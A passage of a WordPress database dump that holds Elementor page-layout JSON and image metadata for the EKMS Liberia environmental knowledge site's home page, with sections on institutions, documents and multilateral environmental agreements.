]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#002600\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11415,1852,'_elementor_version','2.7.5'),(11416,1852,'_elementor_template_type','wp-page'),(11417,1852,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11427,1854,'_wp_attached_file','2019/11/featured_cbd-1.jpg'),(11428,1854,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:554;s:4:\"file\";s:26:\"2019/11/featured_cbd-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"featured_cbd-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"featured_cbd-1-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"featured_cbd-1-768x425.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"RD1006\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1451687431\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11429,1855,'_wp_attached_file','2019/11/featured_ccd-e1618235603738.jpg'),(11430,1855,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:554;s:4:\"file\";s:39:\"2019/11/featured_ccd-e1618235603738.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"featured_ccd-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"featured_ccd-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"featured_ccd-768x425.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"13\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCE-3000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1473259065\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"18\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11431,1856,'_wp_attached_file','2019/11/featured_fccc.jpg'),(11432,1856,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:554;s:4:\"file\";s:25:\"2019/11/featured_fccc.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"featured_fccc-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"featured_fccc-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"featured_fccc-768x425.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:425;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"13\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"ILCE-3000\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1487354324\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"40\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(11433,1857,'_wp_page_template','default'),(11434,1857,'_elementor_edit_mode','builder'),(11435,1857,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas 